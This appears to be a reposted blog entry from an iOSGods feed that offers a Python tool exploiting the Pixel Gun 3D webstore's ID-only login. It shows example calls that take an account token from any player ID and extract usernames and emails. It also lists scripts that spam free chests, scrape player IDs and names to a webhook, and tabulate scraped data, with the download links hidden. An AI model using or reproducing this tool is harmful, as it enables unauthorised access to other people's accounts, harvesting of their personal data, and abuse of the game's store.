Monday 25 September 2023

Pixel Gun 3D Reversed Webstore API

Pixel Gun 3D Reversed webstore API What is this? So recently Pixel Gun 3D released their new webstore which allows players to purchase currency and other in game stuff from their browsers and they use xsolla's API. On their webstore, you can login to an account using only the ID that means you can login to anyone's account. Xsolla's API would return the authentication token which is the users data base64 decoded which contains the player's username. The webstore also allows you to claim free chests and simply by replicating the request in Python, you can automate the process of scraping user accounts and giving out free chests. Example Usage import api # getting a token from user ID token = api.getToken("297974059") print("Token: " + token + "\n") # getting a username from a token username = api.getUsernameFromToken(token) print("Username" + username + "\n") # getting an email from a token, will only work if the user has bought something from the web store email = api.getEmailFromToken(token) print("Email: " + email + "\n") # give free chest status = api.freeChest(token) print("Free chest status: " + str(status)) File Info: example spam chests.py - Gives free chests to people by ID example webhook.py - Simple player scraper that sends the players ID and username to a webhook example table.py Another simple player data scraper but prints it out as a table Download: [Hidden Content] [Hidden Content]

from iOSGods RSS Feed https://ift.tt/BbTsa8x

No comments:

Post a Comment